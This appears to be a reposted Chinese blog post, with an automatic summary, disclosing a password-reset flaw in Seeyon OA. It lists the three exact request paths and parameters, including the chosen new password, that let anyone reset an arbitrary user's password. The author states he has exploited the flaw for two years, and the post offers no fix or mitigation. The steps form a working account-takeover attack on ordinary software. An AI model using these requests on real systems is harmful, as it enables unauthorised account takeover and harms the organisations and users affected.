文章总结: 本文档介绍了一个致远系统的密码重置漏洞,该漏洞允许攻击者通过三个步骤重置任意用户密码。首先访问retrievePassword接口输入目标账号,然后访问sendVerificationCodeToBindNum接口,最后通过resetPassword接口设置新密码。该漏洞是作者在2023年审计发现的,已被利用约两年,属于严重安全漏洞,可能导致账户被完全接管。文章提供了具体的攻击路径和参数,但没有提供修复建议或厂商响应情况。
综合评分: 65
文章分类: 漏洞分析,代码审计,WEB安全
致远密码重置漏洞
emperor
代码审计Study
2025年11月14日 09:32
中国香港
分享一个我23年审计出来的致远密码重置漏洞。
第一部访问 /seeyon/personalBind.do?method=retrievePassword
输入要修改的账号,图片验证码账号必须存在才能修改密码。
第二步访问 /seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx
第三步访问 /seeyon/individualManager.do?method=resetPassword&nowpwd=adz111@926saSKSJ
adz111@926saSKSJ是修改的密码,账号到第一步自己填。
已经利用了2年估计已经被打烂了。
该文章转发量过666直播讲解挖掘思路
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:代码审计Study emperor《致远密码重置漏洞》